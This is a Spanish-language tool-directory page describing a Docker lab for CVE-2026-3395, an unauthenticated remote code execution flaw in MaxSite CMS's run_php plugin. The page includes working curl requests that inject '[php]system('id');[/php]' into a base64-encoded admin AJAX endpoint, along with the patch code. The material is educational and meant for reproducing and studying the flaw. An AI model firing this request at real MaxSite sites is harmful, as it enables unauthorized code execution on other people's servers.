Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/rootdirective-sec/cve-2026-3395-lab
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónLabs y Práctica
GitHubrootdirective-sec/cve-2026-3395-lab

CVE-2026-3395-Lab

Lab educativo de Docker que demuestra CVE-2026-3395, un RCE no autenticado en MaxSite CMS a través del plugin run_php, con entornos vulnerables y parcheados para una reproducción y análisis seguros.

Ver Repositorio
123hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-3395 — Laboratorio de RCE no autenticado en MaxSite CMS

Este repositorio es solo para fines educativos y de investigación. Todas las pruebas deben realizarse en un entorno de laboratorio Docker local. No implemente esta configuración en sistemas públicos o de producción.


Resumen

CVE-2026-3395 afecta a MaxSite CMS y permite el acceso no autenticado a un endpoint AJAX administrativo. Cuando el plugin run_php está habilitado, la entrada del usuario puede evaluarse como código PHP a través del sistema de hooks del CMS, lo que puede conducir a la Ejecución Remota de Código (RCE).

Este repositorio incluye:

  • Una compilación vulnerable (commit anterior al parche)
  • Una compilación parcheada (commit posterior a la corrección)
  • Un laboratorio Docker para la reproducción
  • Una demostración segura del impacto

Descripción general de la vulnerabilidad

El endpoint vulnerable se encuentra en:

application/maxsite/admin/plugins/editor_markitup/preview-ajax.php

En la versión vulnerable:

  • Se puede acceder al endpoint sin autenticación
  • La entrada del usuario (datos POST) se pasa a través de mso_hook()
  • El plugin run_php procesa los bloques [php]...[/php]
  • El plugin evalúa el código encerrado usando eval()

Si run_php está habilitado, esto resulta en una ejecución remota de código no autenticada.

La versión parcheada añade:

if (!is_login()) die('no login');
mso_checkreferer();

Esto restringe el acceso solo a usuarios autenticados.


Configuración del laboratorio Docker

Este laboratorio construye dos entornos:

EntornoPuerto
Vulnerable8081
Parcheado8082

Requisitos

  • Docker
  • Docker Compose v2

1. Compilar e iniciar

docker compose up -d --build

Esto hará lo siguiente:

  • Compilar ambas imágenes
  • Iniciar las bases de datos
  • Ejecutar el instalador del CMS automáticamente
  • Habilitar run_php en la configuración del laboratorio

2. Verificar la instalación

Abra en su navegador:

http://localhost:8081  (Vulnerable)
http://localhost:8082  (Parcheado)

Ambas instancias deberían cargar correctamente.

Laboratorio en ejecución


Prueba de la vulnerabilidad (solo laboratorio)

La ruta AJAX utiliza una ruta codificada en base64.

El base64 de:

admin/plugins/editor_markitup/preview-ajax.php

es:

YWRtaW4vcGx1Z2lucy9lZGl0b3JfbWFya2l0dXAvcHJldmlldy1hamF4LnBocA==

Prueba en la instancia vulnerable

curl -X POST "http://localhost:8081/ajax/YWRtaW4vcGx1Z2lucy9lZGl0b3JfbWFya2l0dXAvcHJldmlldy1hamF4LnBocA==" \
  -H "X-Requested-With: XMLHttpRequest" \
  -H "Referer: http://localhost:8081/" \
  --data-urlencode "data=[php]system('id');[/php]"

Salida RCE vulnerable


Prueba en la instancia parcheada

curl -X POST "http://localhost:8082/ajax/YWRtaW4vcGx1Z2lucy9lZGl0b3JfbWFya2l0dXAvcHJldmlldy1hamF4LnBocA==" \
  -H "X-Requested-With: XMLHttpRequest" \
  -H "Referer: http://localhost:8082/" \
  --data-urlencode "data=[php]system('id');[/php]"

Resultado esperado:

no login

Control de acceso parcheado


Detener el laboratorio

Para detener los contenedores:

docker compose down -v

Aviso legal

Utilice este proyecto solo en entornos aislados con fines de investigación y aprendizaje.


Referencias

  • Informe público: https://github.com/mbanyamer/CVE-2026-3395-MaxSite-CMS-Unauthenticated-RCE/
  • Entrada de VulDB: https://vuldb.com/?submit.762169
  • Commit oficial del parche: https://github.com/maxsite/cms/commit/08937a3c5d672a242d68f53e9fccf8a748820ef3
Descargar herramienta